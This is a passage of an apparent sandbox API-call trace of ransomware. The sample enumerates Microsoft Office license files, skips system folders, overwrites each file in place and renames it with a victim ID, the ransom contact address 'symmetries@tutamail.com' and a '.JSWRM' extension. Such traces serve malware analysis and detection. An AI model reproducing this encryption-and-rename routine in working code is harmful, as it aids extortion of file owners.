Office\\root\\Licenses16\\VisioProR_Grace-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_grace-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.521] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e7a0 | out: hHeap=0x1e0000) returned 1 [0111.521] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0111.521] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0111.521] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0111.521] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0111.521] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebe39b27, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xebe39b27, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xebf44bc1, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d51, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioProR_Grace-ul-oob.xrm-ms", cAlternateFileName="VI6CD6~1.XRM")) returned 1 [0111.521] lstrcmpiW (lpString1="VisioProR_Grace-ul-oob.xrm-ms", lpString2=".") returned 1 [0111.521] lstrcmpiW (lpString1="VisioProR_Grace-ul-oob.xrm-ms", lpString2="..") returned 1 [0111.521] lstrcmpiW (lpString1="VisioProR_Grace-ul-oob.xrm-ms", lpString2="...") returned 1 [0111.521] lstrcmpiW (lpString1="VisioProR_Grace-ul-oob.xrm-ms", lpString2="windows") returned -1 [0111.521] lstrcmpiW (lpString1="VisioProR_Grace-ul-oob.xrm-ms", lpString2="recovery") returned 1 [0111.521] lstrcmpiW (lpString1="VisioProR_Grace-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0111.521] lstrcmpiW (lpString1="VisioProR_Grace-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0111.521] lstrcmpiW (lpString1="VisioProR_Grace-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.521] lstrcmpiW (lpString1="VisioProR_Grace-ul-oob.xrm-ms", lpString2="system volume information") returned 1 [0111.521] lstrcmpiW (lpString1="VisioProR_Grace-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0111.521] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0111.521] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_Grace-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0111.521] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0111.521] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_Grace-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x241268, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProR_Grace-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0111.521] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0111.521] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0111.521] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_Grace-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0111.521] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0111.521] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_Grace-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x241038, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProR_Grace-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0111.522] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0111.522] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0111.522] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0111.522] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.522] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.522] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0111.522] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_Grace-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_grace-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.522] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11601) returned 1 [0111.522] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.522] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d50) returned 0x24c1d0 [0111.522] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d50, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d50, lpOverlapped=0x0) returned 1 [0111.541] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.541] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d50, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d50, lpOverlapped=0x0) returned 1 [0111.541] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.541] CloseHandle (hObject=0x45c) returned 1 [0111.541] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0111.541] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.541] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0111.541] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.541] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0111.541] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0111.541] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.541] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0111.541] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.542] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0111.542] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0111.542] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0111.542] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0111.542] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0111.542] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_Grace-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_grace-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_Grace-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_grace-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.543] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0111.543] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0111.543] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0111.543] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0111.543] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0111.543] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec1cd3ba, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xec1cd3ba, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xec2b21e6, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2997, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioProR_OEM_Perp-pl.xrm-ms", cAlternateFileName="VIEF23~1.XRM")) returned 1 [0111.543] lstrcmpiW (lpString1="VisioProR_OEM_Perp-pl.xrm-ms", lpString2=".") returned 1 [0111.543] lstrcmpiW (lpString1="VisioProR_OEM_Perp-pl.xrm-ms", lpString2="..") returned 1 [0111.543] lstrcmpiW (lpString1="VisioProR_OEM_Perp-pl.xrm-ms", lpString2="...") returned 1 [0111.543] lstrcmpiW (lpString1="VisioProR_OEM_Perp-pl.xrm-ms", lpString2="windows") returned -1 [0111.543] lstrcmpiW (lpString1="VisioProR_OEM_Perp-pl.xrm-ms", lpString2="recovery") returned 1 [0111.543] lstrcmpiW (lpString1="VisioProR_OEM_Perp-pl.xrm-ms", lpString2="perflogs") returned 1 [0111.543] lstrcmpiW (lpString1="VisioProR_OEM_Perp-pl.xrm-ms", lpString2="documents and settings") returned 1 [0111.543] lstrcmpiW (lpString1="VisioProR_OEM_Perp-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.543] lstrcmpiW (lpString1="VisioProR_OEM_Perp-pl.xrm-ms", lpString2="system volume information") returned 1 [0111.543] lstrcmpiW (lpString1="VisioProR_OEM_Perp-pl.xrm-ms", lpString2="msocache") returned 1 [0111.543] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0111.543] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_OEM_Perp-pl.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0111.543] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0111.543] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_OEM_Perp-pl.xrm-ms", cchWideChar=28, lpMultiByteStr=0x241128, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProR_OEM_Perp-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0111.543] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0111.543] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0111.543] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_OEM_Perp-pl.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0111.543] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0111.544] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_OEM_Perp-pl.xrm-ms", cchWideChar=28, lpMultiByteStr=0x241218, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProR_OEM_Perp-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0111.544] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0111.544] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0111.544] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0111.544] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.544] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.544] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0111.544] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_OEM_Perp-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_oem_perp-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.549] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10647) returned 1 [0111.549] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.549] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2990) returned 0x24c1d0 [0111.549] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2990, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2990, lpOverlapped=0x0) returned 1 [0111.560] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.560] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2990, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2990, lpOverlapped=0x0) returned 1 [0111.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.560] CloseHandle (hObject=0x45c) returned 1 [0111.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0111.560] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0111.560] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0111.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0111.561] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0111.561] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0111.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0111.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e110 [0111.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0111.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0111.561] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_OEM_Perp-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_oem_perp-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_OEM_Perp-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_oem_perp-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0111.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0111.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0111.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0111.564] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0111.564] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec1a7162, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xec1a7162, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xec2b21e6, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5178, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioProR_OEM_Perp-ppd.xrm-ms", cAlternateFileName="VIA791~1.XRM")) returned 1 [0111.568] lstrcmpiW (lpString1="VisioProR_OEM_Perp-ppd.xrm-ms", lpString2=".") returned 1 [0111.569] lstrcmpiW (lpString1="VisioProR_OEM_Perp-ppd.xrm-ms", lpString2="..") returned 1 [0111.569] lstrcmpiW (lpString1="VisioProR_OEM_Perp-ppd.xrm-ms", lpString2="...") returned 1 [0111.569] lstrcmpiW (lpString1="VisioProR_OEM_Perp-ppd.xrm-ms", lpString2="windows") returned -1 [0111.569] lstrcmpiW (lpString1="VisioProR_OEM_Perp-ppd.xrm-ms", lpString2="recovery") returned 1 [0111.569] lstrcmpiW (lpString1="VisioProR_OEM_Perp-ppd.xrm-ms", lpString2="perflogs") returned 1 [0111.569] lstrcmpiW (lpString1="VisioProR_OEM_Perp-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0111.569] lstrcmpiW (lpString1="VisioProR_OEM_Perp-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.569] lstrcmpiW (lpString1="VisioProR_OEM_Perp-ppd.xrm-ms", lpString2="system volume information") returned 1 [0111.569] lstrcmpiW (lpString1="VisioProR_OEM_Perp-ppd.xrm-ms", lpString2="msocache") returned 1 [0111.569] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0111.569] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_OEM_Perp-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0111.569] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0111.569] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_OEM_Perp-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x241268, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProR_OEM_Perp-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0111.569] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0111.569] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0111.569] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_OEM_Perp-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0111.569] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0111.569] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_OEM_Perp-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x241380, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProR_OEM_Perp-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0111.569] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0111.569] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0111.569] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0111.569] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.569] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.569] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0111.569] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_OEM_Perp-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_oem_perp-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.572] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20856) returned 1 [0111.572] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.572] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5170) returned 0x24c1d0 [0111.572] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5170, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5170, lpOverlapped=0x0) returned 1 [0111.584] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.584] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5170, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5170, lpOverlapped=0x0) returned 1 [0111.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.585] CloseHandle (hObject=0x45c) returned 1 [0111.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0111.585] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0111.585] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0111.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0111.585] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0111.585] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.585] HeapFree (in: 